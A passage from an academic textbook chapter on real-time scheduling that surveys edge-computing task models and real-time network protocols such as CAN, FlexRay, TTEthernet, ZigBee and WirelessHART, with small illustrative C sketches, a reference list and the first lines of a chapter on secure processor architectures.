resource) on the servers. The deadline denotes the bound on the task response time.
Several deadline-constrained studies provide this parameter. The communication
time is considered by those studies that assume a (fixed or variable) offloading
bandwidth for tasks. Besides these three explicit parameters, two parameters
indirectly contribute to the task response time under the contention model. The
computation capacity of the edge servers affects the execution time of the task,
whereas the communication capacity of the edge server plays a role in determining
the communication time. This section introduces two model parameters: service
rate and transmission delay. The former refers to the rate at which the tasks are
served (executed) at the server. The latter denotes the additional network delay in
the transmission medium of the system.
1. The service rate and arrival rate of the tasks are considered by relatively fewer
studies in the real-time edge literature (Gao et al. 2019; Xiao and Krunz 2017).
Most works use a Markovian queuing model, either M/M/m or M/M/1, where m
or 1 denotes the number of servers. Under this model, the arrival rate of the tasks
is characterized by a Poisson process and the service time follows an exponential
distribution; a small numerical sketch of this model follows the list.
2. The transmission delay in a multi-tier architecture consists of device-server
delay (Gao et al. 2019; Ouyang et al. 2019; Tan et al. 2017; Vu et al. 2018;
Xiao and Krunz 2017) and server-server delay (Ouyang et al. 2019; Vu et al.
2018; Xiao and Krunz 2017). The device-server delay is the time taken by the
device to transmit data to the server (or vice versa), in excess of the data transmission
time. This parameter plays a vital role in determining the server for task offloading.
Studies in the literature have modelled it as a constant as well as a variable
parameter. In practice, this translates to the server distance from the device or
the signal strength of the access point used for communication. The server-server
delay parameter is usually introduced when dealing with task offloading and
migrations between servers, that is, when tasks are offloaded from one server
to another server, which may or may not be located at the same tier. The task
offloading and server resource provisioning are the two problems pertaining to
this parameter.
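As an illustration of the service-rate parameter, the short sketch below evaluates the mean response time of an M/M/1 queue, W = 1/(μ − λ), for a task arrival rate λ and a service rate μ; the function name and the example rates are illustrative assumptions, not taken from the cited studies.

#include <stdio.h>

/* Mean response time of an M/M/1 queue: W = 1 / (mu - lambda).
 * Valid only when the queue is stable, i.e. lambda < mu. */
double mm1_response_time(double lambda, double mu) {
    if (lambda >= mu)
        return -1.0;  /* unstable queue: response time grows unboundedly */
    return 1.0 / (mu - lambda);
}

int main(void) {
    /* e.g. 80 tasks/s arriving at a server that serves 100 tasks/s */
    printf("W = %.4f s\n", mm1_response_time(80.0, 100.0));  /* 0.0500 s */
    return 0;
}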
The response time of tasks executing in edge servers depends on both the
computation time and the communication time. Most resource allocation studies
in real-time edge either do not consider the communication delay or abstract the
communication delay between the devices and/or servers using timing parameters.
Guaranteeing end-to-end deadlines in edge computing is not feasible without
incorporating the delay parameters for the communication. Several real-time com-
munication algorithms specific to a communication medium have been designed.
The following section discusses the algorithms and protocols designed for real-time
networks.
Real-Time Networks

In a distributed real-time system, timely communication is required between the end devices
(sensors, actuators, motors) and the cloud or edge servers (controllers). Some of
the wired network protocols that are widely adopted for real-time communications
include the Controller Area Network (CAN) bus (Othman
et al. 2006), FlexRay networks (Makowitz and Temple 2006), TTEthernet (Kopetz
et al. 2005), etc. A brief overview of each of these protocols is presented below.
Controller Area Network (CAN) A CAN bus is a simple, robust, low-cost and easily
accessible vehicle bus standard designed for communication among the electronic
devices embedded in a vehicle (Othman et al. 2006). Prior to the introduction of the
CAN bus, each electronic device in a car was connected to every other device. As
more and more functions were implemented in automobiles, maintaining this
complex wiring system became very difficult. This led the automotive industry to
introduce the CAN bus system, which allows the electronic control units (ECUs) to
communicate with each other by connecting each ECU to a common serial bus,
thereby reducing the wiring overheads of the system. Although the CAN bus was
developed for automobiles, nowadays it is also used in industrial settings to connect
vital components such as microcontrollers and sensors.
The CAN protocol defines a set of rules to transmit and receive messages
through the serial bus. The devices on the network are known as nodes; the nodes are
equipped with specific hardware and software to enable the transmission and reception
of messages. Whenever a node has some data to transmit, it checks the state of
the CAN bus. If the bus is idle, the node writes the data frame on the bus. All the
nodes on the shared bus receive the data frame. This data frame does not contain
the addresses of the transmitting or receiving node. Instead, a unique arbitration ID
labels each data frame. Depending on this ID, the CAN node decides whether to
accept or reject the frame. If multiple nodes attempt to transmit data at the same
time, the node with the lowest arbitration ID gets access to transmit. Thus, nodes
with higher arbitration ID have to wait until the bus becomes available for data
transmission. It has been shown both theoretically and experimentally that the worst-
case response time in a CAN bus is bounded (Tindell et al. 2000). As a result, the
communications among the CAN nodes are deterministic. This ensures predictable
data transmissions with real-time guarantees in a CAN network.
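The arbitration rule described above can be condensed into a small sketch: among all nodes contending for the idle bus, the frame with the numerically lowest arbitration ID wins. The data structures and sample IDs below are illustrative assumptions, not part of the CAN specification.

#include <stdio.h>

/* A pending CAN frame: a lower arbitration ID means higher priority. */
struct can_frame {
    unsigned id;       /* 11-bit arbitration ID */
    const char *data;  /* payload (simplified) */
};

/* Return the index of the frame that wins arbitration, i.e. the one
 * with the lowest arbitration ID among all contending nodes. */
int arbitrate(const struct can_frame *pending, int n) {
    int winner = 0;
    for (int i = 1; i < n; i++)
        if (pending[i].id < pending[winner].id)
            winner = i;
    return winner;
}

int main(void) {
    struct can_frame pending[] = {
        {0x123, "engine"}, {0x05A, "brakes"}, {0x3F0, "radio"}
    };
    int w = arbitrate(pending, 3);
    printf("ID 0x%03X (%s) transmits first\n", pending[w].id, pending[w].data);
    return 0;
}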
FlexRay Although the CAN bus communication network is flexible and highly
scalable, it has limited bandwidth, i.e. the arbitration process in a CAN bus
does not allow high data rates, and hence it cannot always guarantee timely
delivery of data. To overcome these drawbacks, the FlexRay network protocol was
introduced (Makowitz and Temple 2006). FlexRay is the first time-triggered
network protocol capable of handling, in a predictable manner, both deterministic
data arriving in a specific time frame and event-triggered data.
The communication in a FlexRay network is time-division multiple access
(TDMA) based, i.e. time is divided into slots and each communication occurs in
such slots. This TDMA-based communication in a FlexRay network guarantees
determinism and ensures timely delivery of data. Hence, unlike a CAN network,
FlexRay is very suitable for real-time applications. The duration of a time-slot
depends on the application requirement. All the nodes in a FlexRay network are
synchronized to the same clock. The time-slots for communication are assigned to
the nodes when they join the network. A node can write to the bus only in the slots
assigned to it.
The communications in a FlexRay network occur in cycles, the duration of which
varies between 1 and 5 ms. A communication cycle is divided into four segments:
a static segment, a dynamic segment, a symbol window and a network idle time.
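The slot-based medium access can be illustrated with a minimal sketch: a node may write to the bus only in the slots statically assigned to it within each cycle. The slot table, cycle length and node identifiers below are hypothetical, not taken from the FlexRay specification.

#include <stdio.h>

#define SLOTS_PER_CYCLE 8

/* Static slot assignment: slot_owner[s] is the node allowed to
 * transmit in slot s of every communication cycle (hypothetical). */
static const int slot_owner[SLOTS_PER_CYCLE] = {1, 2, 3, 1, 2, 3, 4, 4};

/* May node `node` transmit at global time-slot `t`? Only if it owns
 * the corresponding slot within the current cycle. */
int may_transmit(int node, unsigned long t) {
    return slot_owner[t % SLOTS_PER_CYCLE] == node;
}

int main(void) {
    for (unsigned long t = 0; t < 10; t++)
        printf("slot %lu: node %d transmits\n", t,
               slot_owner[t % SLOTS_PER_CYCLE]);
    return 0;
}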
TTEthernet Although FlexRay has support for both deterministic real-time applications
and event-triggered non-real-time applications, it is not scalable to large
complex networks. Thus, Time-Triggered Ethernet (TTEthernet) was specifically
designed to support complex networks in large-scale real-time applications such as
aerospace and automobiles (Kopetz et al. 2005). TTEthernet supports deterministic
real-time communications over Ethernet, providing much more scalability
compared to CAN or FlexRay networks.
TTEthernet is fully compatible with the IEEE 802.3 Ethernet standard (IEEE
2018). In a TTEthernet network, time-triggered traffic always takes precedence
over standard Ethernet traffic. Thus, TTEthernet guarantees very precise individual
packet-level scheduling, which makes it very suitable for safety-critical applications.
In addition, TTEthernet also supports packet replication, i.e. each packet is
immediately re-transmitted through another channel if the channel in use becomes
faulty. This helps to overcome failures, ensuring reliable communications.
ZigBee The ZigBee wireless protocol is designed to transmit small amounts of data
over a short distance with very low power consumption (Safaric and Malaric 2006).
ZigBee is based on low-rate wireless personal area network (LR-WPAN) technology.
It is much simpler compared to Bluetooth and is based on the IEEE 802.15.4
standard (IEEE 2016). It is highly suitable for, and widely adopted in, smart
manufacturing, home automation, the Internet of Things (IoT), wireless sensor
networks (WSNs), etc., owing to its ease of installation, reliable data transfer,
short-range communication, low-cost devices and reasonable battery life.
Two different types of devices are used in ZigBee networks:
• A full functional device (FFD) that can be used either as a PAN coordinator, or
as a coordinator, or as a device
• A reduced functional device (RFD) that can be used in very simple applications
A ZigBee network must include at least one FFD to serve as the PAN coordinator.
The PAN coordinator serves as the primary controller of the PAN and is responsible
for initiating, terminating and routing the communication in the network. Based on
the functions associated with the devices, there are three different types of devices
in a ZigBee network: ZigBee Coordinator, ZigBee Router and ZigBee End Device.
A ZigBee network is associated with only one ZigBee Coordinator. However,
the ZigBee network can have multiple ZigBee Routers and multiple ZigBee end
devices.
ZigBee networks are secure and reliable in nature; the protocol supports 128-bit
advanced encryption standard (AES) encryption. The communications in ZigBee
are based on carrier-sense multiple access with collision avoidance (CSMA/CA).
However, to support the low-latency requirements of real-time applications, the
devices in ZigBee can also transmit in guaranteed time-slots. The schedule for
communications in these guaranteed time-slots is pre-computed in order to satisfy
the deadlines of real-time applications.
WirelessHART WirelessHART is a highly suitable and reliable WSN protocol
that can satisfy hard deadlines and guarantee collision-free deterministic communications
in real-time systems (Chen et al. 2010). It is based on the IEEE 802.15.4
standards and is the most widely adopted wireless protocol in industrial control
systems. A WirelessHART network consists of a gateway, multiple field devices,
access points (APs) and a centralized network manager. The network manager,
installed on the gateway, manages the devices, creates the routes, optimizes the
network and generates the transmission schedule for the devices. The field devices
are mainly wireless sensors and actuators. The APs, connected to the gateway,
generate redundant paths between the gateway and the field devices for reliable
communication.
The key characteristic features of a WirelessHART network include TDMA-based communication in fixed 10 ms time-slots, channel hopping across multiple channels to mitigate interference and redundant routes for reliable communication.
Real-Time Flow
A real-time flow Fi periodically generates data packets at a source node si that must
be delivered to a destination node di within a relative deadline; pi denotes the period of Fi.

Release Time The release time of the j th instance of flow Fi (j ≥ 1) is the time
at which the j th instance of Fi is released at the source node si. The release time
(rij) is defined as

rij = (j − 1) × pi (1)
Number of hops The number of hops in the route of a flow Fi is the number of
transmissions required to reach the destination node (di ) from the source node (si ).
Scheduling Window The scheduling window (Wij) of the j th instance of the ith flow
Fi is the set of time-slots between its release time rij and its deadline δij; a time-slot
σ ∈ Wij if rij + 1 ≤ σ ≤ δij.
Any real-time flow scheduling algorithm needs to satisfy four constraints, namely,
no transmission conflicts, no collisions, no deadline violations and flow sequence
preservation, to schedule a real-time flow.
Figure 9 shows a feasible schedule S over the network graph G with two
periodic real-time flows F1 (marked in purple) and F2 (marked in orange) and with
two channels. The flows, F1 and F2 , have their sources at node A and node D,
Fig. 9 A feasible schedule S over a network graph G with two periodic real-time flows, F1
(in purple) and F2 (in orange) and two channels. The flows have their sources s1 = A, s2 = D;
destinations, d1 = d2 = B; period p1 = 4 time-slots, p2 = 8 time-slots; relative deadline δ1 = 4
time-slots, δ2 = 8 time-slots; routes R1 = {A → C → B}, R2 = {D → C → B}
respectively. Both of them have their destination at node B. The periods and the
relative deadlines of F1 and F2 are 4 time-slots and 8 time-slots, respectively. Since
the period of the flows is equal to their relative deadlines, the flows have implicit
deadlines. The hyperperiod of the schedule S is 8 time-slots. In this hyperperiod
schedule S, F1 has two flow instances with release times at time-slots 0 and 4, and
F2 has one flow instance with release time at 0. Therefore, the scheduling windows
associated with the two instances of F1 are given by the time-slots in [1,4] and [5,8],
respectively. Similarly, the scheduling window associated with the instance of F2 is
given by the time-slots in [1,8]. Since both the flows require two transmissions to
reach the destination node B from their respective source nodes, the number of hops
for both of them is 2.
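The release times and scheduling windows of this example follow directly from Eq. (1); the sketch below reproduces them for F1 and F2 over the 8-slot hyperperiod (the helper names are ours).

#include <stdio.h>

/* Release time of the j-th instance (j >= 1) of a flow with period p,
 * per Eq. (1): r_ij = (j - 1) * p. */
int release_time(int j, int p) { return (j - 1) * p; }

static void print_windows(const char *name, int p, int rel_deadline, int hyper) {
    for (int j = 1; (j - 1) * p < hyper; j++) {
        int r = release_time(j, p);
        /* Scheduling window: slots s with r + 1 <= s <= r + rel_deadline. */
        printf("%s instance %d: release %d, window [%d,%d]\n",
               name, j, r, r + 1, r + rel_deadline);
    }
}

int main(void) {
    int hyperperiod = 8;                     /* lcm(4, 8) time-slots */
    print_windows("F1", 4, 4, hyperperiod);  /* windows [1,4] and [5,8] */
    print_windows("F2", 8, 8, hyperperiod);  /* window [1,8] */
    return 0;
}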
Routing is the process of selecting paths through the network for the data packets
flowing from the source device to the destination device, while properly managing
the network traffic. Routing of data packets in WSNs is challenging due to several
constraints in the WSNs, such as node deployment, limited energy, scalability,
fault tolerance, network heterogeneity, network connectivity, etc. Based on these
factors, several routing algorithms exist in the literature, such as dynamic source
routing (DSR) (Johnson and Maltz 1996), Ad-hoc On-Demand Distance Vector
routing (AODV) (Perkins and Royer 1999) and greedy forwarding (GF) (Takagi and
Kleinrock 1984). However, none of these algorithms satisfies the timeliness
requirements of real-time systems. Hence, they are not applicable for routing
real-time flows in the network. The main objective of a routing algorithm in a
real-time system is to route the real-time flows such that the deadlines of the flows
are guaranteed while the transmission delay bound in the network is still satisfied.
The following subsections
discuss two popular real-time routing protocols in WSNs.
Summary
A wide variety of real-time applications are emerging in the fields of robotics,
automotive, healthcare and smart manufacturing. To guarantee predictability and timeliness,
real-time operating systems are usually deployed on computing platforms used
by these systems. This chapter has explained the characteristics of scheduling in
the context of real-time systems for various computing architectures including the
distributed edge servers and communication networks.
The discussion on different computing architectures has shown that the scheduling
algorithms and protocols for real-time systems have to consider the implications
of architectural features, execution models and the network topology. In recent
years, more real-time applications are being built on distributed edge servers
comprising traditional CPUs, GPUs and networks. A separate discussion on resource
provisioning schemes for each architecture has shed some light on achieving both
computation and communication with real-time guarantees.
References
Ali R, Zikria YB, Bashir AK, Garg S, Kim HS (2021) URLLC for 5G and beyond: requirements,
enabling incumbent technologies and network intelligence. IEEE Access 9:67064–67095.
https://doi.org/10.1109/ACCESS.2021.3073806
Allen T, Feng X, Ge R (2019) Slate: enabling workload-aware efficient multiprocessing for modern
GPGPUs. In: 2019 IEEE international parallel and distributed processing symposium (IPDPS).
IEEE, pp 252–261. https://doi.org/10.1109/IPDPS.2019.00035
AMD (2010) Introduction to OpenCL programming. AMD, Santa Clara
AMD (2023) Introducing AMD CDNA 2 architecture: propelling humanity’s foremost research
with the world’s most powerful HPC and AI accelerator. AMD, Santa Clara
Amert T, Anderson JH (2021) Cupidrt: detecting improper GPU usage in real-time applications. In:
2021 IEEE 24th international symposium on real-time distributed computing (ISORC). IEEE,
pp 86–95. https://doi.org/10.1109/ISORC52013.2021.00022
Amert T, Tong Z, Voronov S, Bakita J, Smith FD, Anderson JH (2021) Timewall: enabling time
partitioning for real-time multicore+accelerator platforms. In: 2021 IEEE real-time systems
symposium (RTSS). IEEE, pp 455–468. https://doi.org/10.1109/RTSS52674.2021.00048
Arena F, Pau G, Severino A (2020) A review on IEEE 802.11p for intelligent transportation systems.
J Sens Actuator Netw 9(2). https://doi.org/10.3390/jsan9020022
Armbrust M, Fox A, Griffith R, Joseph AD, Katz RH, Konwinski A, Lee G, Patterson DA, Rabkin
AS, Stoica I, Zaharia MA (2009) Above the clouds: a Berkeley view of cloud computing.
Technical Report UCB/EECS-2009-28, EECS Department, University of California, Berkeley
Augonnet C, Namyst R (2009) A unified runtime system for heterogeneous multi-core architec-
tures. In: César E, Alexander M, Streit A, Träff JL, Cérin C, Knüpfer A, Kranzlmüller D, Jha S
(eds) Euro-Par 2008 workshops – parallel processing. Springer, Berlin/Heidelberg, pp 174–183
Bakita J, Anderson JH (2022) Enabling GPU memory oversubscription via transparent paging to an
NVMe SSD. In: 2022 IEEE real-time systems symposium (RTSS). IEEE, pp 370–382. https://
doi.org/10.1109/RTSS55097.2022.00039
Baruah S (2020) Scheduling DAGs when processor assignments are specified. In: Proceedings of
the 28th international conference on real-time networks and systems, RTNS’20. Association for
Computing Machinery, New York, pp 111–116. https://doi.org/10.1145/3394810.3394813
Baruah S, Mok A, Rosier L (1990a) Preemptively scheduling hard-real-time sporadic tasks on one
processor. In: Proceedings of IEEE real-time systems symposium, pp 182–190. https://doi.org/
10.1109/REAL.1990.128746
Baruah S, Rosier L, Howell R (1990b) Algorithms and complexity concerning the preemptive
scheduling of periodic, real-time tasks on one processor. Real-Time Syst 2:301–324. https://
doi.org/10.1007/BF01995675
Baruah SK, Cohen NK, Plaxton CG, Varvel DA (1993) Proportionate progress: a notion of fairness
in resource allocation. In: Proceedings of the ACM symposium on theory of computing, pp 345–
354
Basaran C, Kang KD (2012) Supporting preemptive task executions and memory copies in
GPGPUs. In: 2012 24th Euromicro conference on real-time systems. IEEE, pp 287–296. https://
doi.org/10.1109/ECRTS.2012.15
Blackberry (1982) Blackberry QNX. https://blackberry.qnx.com/en. Accessed: 03 Aug 2023
Burns A, Wellings A (2009) Real-time systems and programming languages, 4th edn. Addison-Wesley
Longman. https://www.cs.york.ac.uk/rts/books/RTSBookFourthEdition.html
Buttazzo GC (2011) Hard real-time computing systems: predictable scheduling algorithms and
applications, 3rd edn. Springer Publishing Company, Incorporated
Castellano G, Esposito F, Risso F (2019) A distributed orchestration algorithm for edge computing
resources with guarantees. In: IEEE INFOCOM 2019-IEEE conference on computer commu-
nications. IEEE, pp 2548–2556
Chen D, Nixon M, Mok A (2010) WirelessHART: real-time mesh network for industrial automa-
tion. Springer. https://doi.org/10.1007/978-1-4419-6047-4
Chen L, Xu J (2019) Task replication for vehicular cloud: contextual combinatorial bandit with
delayed feedback. In: IEEE INFOCOM 2019 – IEEE conference on computer communications.
IEEE Press, pp 748–756. https://doi.org/10.1109/INFOCOM.2019.8737654
Chen S, Jiao L, Wang L, Liu F (2019) An online market mechanism for edge emergency
demand response via cloudlet control. In: IEEE INFOCOM 2019-IEEE conference on computer
communications. IEEE, pp 2566–2574
Chen X, Jiao L, Li W, Fu X (2015) Efficient multi-user computation offloading for mobile-edge
cloud computing. IEEE/ACM Trans Netw 24(5):2795–2808
Crow B, Widjaja I, Kim J, Sakai P (1997) IEEE 802.11 wireless local area networks. IEEE
Commun Mag 35(9):116–126, https://doi.org/10.1109/35.620533
Cziva R, Anagnostopoulos C, Pezaros DP (2018) Dynamic, latency-optimal VNF placement at the
network edge. In: IEEE infocom 2018-IEEE conference on computer communications. IEEE,
pp 693–701
Dai Y, Xu D, Maharjan S, Zhang Y (2018) Joint offloading and resource allocation in vehicular
edge computing and networks. In: 2018 IEEE global communications conference (GLOBE-
COM). IEEE, pp 1–7
Davis RI, Burns A (2011) A survey of hard real-time scheduling for multiprocessor systems. ACM
Comput Surv (CSUR) 43(4):1–44
Dertouzos M, Mok A (1989) Multiprocessor online scheduling of hard-real-time tasks. IEEE Trans
Softw Eng 15(12):1497–1506. https://doi.org/10.1109/32.58762
Dertouzos ML (1974) Control robotics: the procedural control of physical processes. Inf Process
74:807–813
Dhall SK, Liu CL (1978) On a real-time scheduling problem. Oper Res 26(1):127–140. https://doi.
org/10.1287/opre.26.1.127
Fisher N, Goossens J, Baruah S (2010) Optimal online multiprocessor scheduling of sporadic real-
time tasks is impossible. Real-Time Syst 45:26–71. https://doi.org/10.1007/s11241-010-9092-7
Gao B, Zhou Z, Liu F, Xu F (2019) Winning at the starting line: joint network selection and
service placement for mobile edge computing. In: IEEE INFOCOM 2019-IEEE conference on
computer communications. IEEE, pp 1459–1467
Guo J, Song Z, Cui Y, Liu Z, Ji Y (2017) Energy-efficient resource allocation for multi-user mobile
edge computing. In: GLOBECOM 2017–2017 IEEE global communications conference. IEEE,
pp 1–7
He T, Stankovic J, Lu C, Abdelzaher T (2003) Speed: a stateless protocol for real-time communi-
cation in sensor networks. In: 23rd international conference on distributed computing systems,
2003. Proceedings, pp 46–55. https://doi.org/10.1109/ICDCS.2003.1203451
Heydari J, Ganapathy V, Shah M (2019) Dynamic task offloading in multi-agent mobile edge
computing networks. In: 2019 IEEE global communications conference (GLOBECOM). IEEE,
pp 1–6
IEEE (2016) IEEE standard for low-rate wireless networks. IEEE Std 802154-2015 (Revision of
IEEE Std 802154-2011), pp 1–709. https://doi.org/10.1109/IEEESTD.2016.7460875
IEEE (2018) IEEE Standard for Ethernet. IEEE Std 8023-2018 (Revision of IEEE Std 8023-2015).
pp 1–5600. https://doi.org/10.1109/IEEESTD.2018.8457469
Intel (2021) Intel processor graphics gen11 architecture. Intel, Santa Clara
ISO (2018) ISO 26262: road vehicles – functional safety. https://www.iso.org/standard/68383.html.
Accessed: 03 Aug 2023
Jain S, Baek I, Wang S, Rajkumar R (2019) Fractional GPUs: software-based compute and memory
bandwidth reservation for GPUs. In: 2019 IEEE real-time and embedded technology and
applications symposium (RTAS). IEEE, pp 29–41. https://doi.org/10.1109/RTAS.2019.00011
Jiang J, Wang Z, Liu X, Gómez-Luna J, Guan N, Deng Q, Zhang W, Mutlu O (2020) Boyi:
a systematic framework for automatically deciding the right execution model of OpenCL
applications on FPGAs. In: Proceedings of the 2020 ACM/SIGDA international symposium on
field-programmable gate arrays, FPGA’20. Association for Computing Machinery, New York,
pp 299–309. https://doi.org/10.1145/3373087.3375313
Jog A, Kayiran O, Chidambaram Nachiappan N, Mishra AK, Kandemir MT, Mutlu O, Iyer R, Das
CR (2013) Owl: cooperative thread array aware scheduling techniques for improving GPGPU
performance. SIGPLAN Not 48(4):395–406. https://doi.org/10.1145/2499368.2451158
Johnson DB, Maltz DA (1996) Dynamic source routing in ad hoc wireless networks. Springer,
Boston, pp 153–181. https://doi.org/10.1007/978-0-585-29603-6_5
Jošilo S, Dán G (2019) Wireless and computing resource allocation for selfish computation
offloading in edge computing. In: IEEE INFOCOM 2019-IEEE conference on computer
communications. IEEE, pp 2467–2475
Kang W, Lee K, Lee J, Shin I, Chwa HS (2021) Lalarand: flexible layer-by-layer CPU/GPU
scheduling for real-time DNN tasks. In: 2021 IEEE real-time systems symposium (RTSS).
IEEE, pp 329–341. https://doi.org/10.1109/RTSS52674.2021.00038
Kao YH, Krishnamachari B, Ra MR, Bai F (2017) Hermes: latency optimal task assignment for
resource-constrained mobile computing. IEEE Trans Mob Comput 16(11):3056–3069
Kato S, Lakshmanan K, Kumar A, Kelkar M, Ishikawa Y, Rajkumar R (2011a) RGEM: a
responsive GPGPU execution model for runtime engines. In: 2011 IEEE 32nd real-time systems
symposium. IEEE, pp 57–66. https://doi.org/10.1109/RTSS.2011.13
Kato S, Lakshmanan K, Rajkumar R, Ishikawa Y (2011b) TimeGraph: GPU scheduling for real-
time multi-tasking environments. In: 2011 USENIX annual technical conference (USENIX
ATC 11). USENIX Association, Portland. https://www.usenix.org/conference/usenixatc11/
timegraph-gpu-scheduling-real-time-multi-tasking-environments
Kim BS, Park H, Kim KH, Godfrey D, Kim KI (2017) A survey on real-time communications
in wireless sensor networks. Wirel Commun Mob Comput 2017:1–14. https://doi.org/10.1155/
2017/1864847
Kim MK (2021) Efficient link scheduling based on estimated number of packets in queue
on industrial wireless sensor networks. Energies 14(19). https://doi.org/10.3390/en14196370,
https://www.mdpi.com/1996-1073/14/19/6370
Kopetz H, Ademaj A, Grillinger P, Steinhammer K (2005) The time-triggered ethernet (TTE)
design. In: Eighth IEEE international symposium on object-oriented real-time distributed
computing (ISORC’05), pp 22–33. https://doi.org/10.1109/ISORC.2005.56
Leonardi L, Lo Bello L, Patti G (2023) Resemble: a real-time stack for synchronized mesh mobile
bluetooth low energy networks. Appl Syst Innov 6. https://doi.org/10.3390/asi6010019
Leung JYT, Whitehead J (1982) On the complexity of fixed-priority scheduling of periodic,
real-time tasks. Perform Eval 2(4):237–250. http://dblp.uni-trier.de/db/journals/pe/pe2.html#
LeungW82
Levin G, Funk S, Sadowski C, Pye I, Brandt S (2010) Dp-fair: a simple model for understanding
optimal multiprocessor scheduling. In: Euromicro conference on real-time systems. IEEE,
pp 3–13
Lin CC, Shi J, Ueter N, Günzel M, Reineke J, Chen JJ (2022) Type-aware federated scheduling for
typed DAG tasks on heterogeneous multicore platforms. IEEE Trans Comput 72(5):1286–1300.
https://doi.org/10.1109/TC.2022.3202748
Regnier P, Lima G, Massa E, Levin G, Brandt S (2011) Run: optimal multiprocessor real-
time scheduling via reduction to uniprocessor. In: IEEE real-time systems symposium. IEEE,
pp 104–115
Ren J, Yu G, Cai Y, He Y, Qu F (2017) Partial offloading for latency minimization in mobile-
edge computing. In: GLOBECOM 2017-2017 IEEE global communications conference. IEEE,
pp 1–6
Rossbach CJ, Currey J, Silberstein M, Ray B, Witchel E (2011) Ptask: operating system
abstractions to manage GPUs as compute devices. In: Proceedings of the twenty-third ACM
symposium on operating systems principles, pp 233–248
SAE (2021) ARINC 653: avionics application software standard interface. https://www.sae.org/
standards/content/arinc653p0-3/. Accessed: 03 Aug 2023
Safaric S, Malaric K (2006) ZigBee wireless standard. In: Proceedings ELMAR 2006, pp 259–262.
https://doi.org/10.1109/ELMAR.2006.329562
Saifullah A, Xu Y, Lu C, Chen Y (2010) Real-time scheduling for WirelessHART networks. In: 2010
31st IEEE real-time systems symposium, pp 150–159. https://doi.org/10.1109/RTSS.2010.41
Samaddar A, Easwaran A, Tan R (2020) A schedule randomization policy to mitigate timing
attacks in WirelessHART networks. Real-Time Syst 56:452–489
Silberschatz A, Gagne G, Galvin PB (2018) Operating system concepts, 10th edn. Wiley. https://
www.os-book.com/OS10/
Sprunt B, Sha LR, Lehoczky JP (1989) Scheduling sporadic and aperiodic events in a hard real-
time system. Final report. https://resources.sei.cmu.edu/asset_files/TechnicalReport/1989_005_
001_15749.pdf
Sun C, She C, Yang C (2017) Energy-efficient resource allocation for ultra-reliable and low-latency
communications. In: GLOBECOM 2017-2017 IEEE global communications conference. IEEE,
pp 1–6
Takagi H, Kleinrock L (1984) Optimal transmission ranges for randomly distributed packet radio
terminals. IEEE Trans Commun 32(3):246–257. https://doi.org/10.1109/TCOM.1984.1096061
Tan H, Han Z, Li XY, Lau FC (2017) Online job dispatching and scheduling in edge-clouds. In:
IEEE INFOCOM 2017-IEEE conference on computer communications. IEEE, pp 1–9
Tanenbaum AS, Bos H (2022) Modern operating systems, 5th edn. Pearson, Boston
Tindell K, Burns A, Wellings A (2000) Calculating controller area network (CAN) mes-
sage response times. Control Eng Pract 3:1163–1169. https://doi.org/10.1016/0967-0661(95)
00112-8
Tong L, Li Y, Gao W (2016) A hierarchical edge cloud architecture for mobile computing. In: IEEE
INFOCOM 2016-The 35th annual IEEE international conference on computer communications.
IEEE, pp 1–9
Vu TT, Van Huynh N, Hoang DT, Nguyen DN, Dutkiewicz E (2018) Offloading energy efficiency
with delay constraint for cooperative mobile edge computing networks. In: 2018 IEEE global
communications conference (GLOBECOM). IEEE, pp 1–6
Vuduc R, Choi J (2013) A brief history and introduction to GPGPU. Springer, Boston, pp 9–23.
https://doi.org/10.1007/978-1-4614-8745-6_2
Wei YH, Leng Q, Han S, Mok AK, Zhang W, Tomizuka M (2013) RT-WiFi: real-time high-speed
communication protocol for wireless cyber-physical control applications. In: 2013 IEEE 34th
real-time systems symposium, pp 140–149. https://doi.org/10.1109/RTSS.2013.22
WindRiverSystems (1987) Windriver vxworks. https://www.windriver.com/products/vxworks.
Accessed: 03 Aug 2023
Xiao Y, Krunz M (2017) Qoe and power efficiency tradeoff for fog computing networks with fog
node cooperation. In: IEEE INFOCOM 2017-IEEE conference on computer communications.
IEEE, pp 1–9
Xu F, Xu J, Chen J, Chen L, Shang R, Zhou Z, Liu F (2023) iGniter: interference-aware GPU
resource provisioning for predictable DNN inference in the cloud. IEEE Trans Parallel Distrib
Syst 34(3):812–827. https://doi.org/10.1109/TPDS.2022.3232715
Yandrofski T, Chen J, Otterness N, Anderson JH, Smith FD (2022) Making powerful enemies
on NVIDIA GPUs. In: 2022 IEEE real-time systems symposium (RTSS). IEEE, pp 383–395.
https://doi.org/10.1109/RTSS55097.2022.00040
Yao J, Lu Q, Tian R, Li K, Guan H (2023) An economy-oriented GPU virtualization with dynamic
and adaptive oversubscription. IEEE Trans Comput 72(5):1371–1383. https://doi.org/10.1109/
TC.2022.3199998
Yaqub U, Sorour S (2018) Multi-objective resource optimization for hierarchical mobile edge
computing. In: 2018 IEEE global communications conference (GLOBECOM). IEEE, pp 1–6
Yu K, Gidlund M, Åkerberg J, Björkman M (2013) Low jitter scheduling for industrial wireless
sensor and actuator networks. In: IECON 2013 – 39th annual conference of the IEEE industrial
electronics society, pp 5594–5599. https://doi.org/10.1109/IECON.2013.6700050
Yu R, Xue G, Zhang X (2018) Application provisioning in fog computing-enabled internet-
of-things: a network perspective. In: IEEE INFOCOM 2018-IEEE conference on computer
communications. IEEE, pp 783–791
Zeng D, Gu L, Guo S, Cheng Z, Yu S (2016) Joint optimization of task scheduling and image
placement in fog computing supported software-defined embedded system. IEEE Trans Comput
65(12):3702–3712
Zhang DY, Wang D (2019) An integrated top-down and bottom-up task allocation approach in
social sensing based edge computing systems. In: IEEE INFOCOM 2019-IEEE conference on
computer communications. IEEE, pp 766–774
Zhang L, Geng S (1998) The complexity of the 0/1 multi-knapsack problem. J Comput Sci Technol
1:46–50. https://doi.org/10.1007/BF02943300
Zhao H, Cui W, Chen Q, Guo M (2023) ISPA: exploiting intra-SM parallelism in GPUs via fine-
grained resource management. IEEE Trans Comput 72(5):1473–1487. https://doi.org/10.1109/
TC.2022.3214088
Zheng X, Cai Z, Li J, Gao H (2017) A study on application-aware scheduling in wireless networks.
IEEE Trans Mob Comput 16(7):1787–1801. https://doi.org/10.1109/TMC.2016.2613529
Zou A, Li J, Gill CD, Zhang X (2023) RTGPU: real-time GPU scheduling of hard deadline parallel
tasks with fine-grain utilization. IEEE Trans Parallel Distrib Syst 34(5):1450–1465. https://doi.
org/10.1109/TPDS.2023.3235439
Secure Processor Architectures
5
Nikhilesh Singh, Vinod Ganesan, and Chester Rebeiro
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
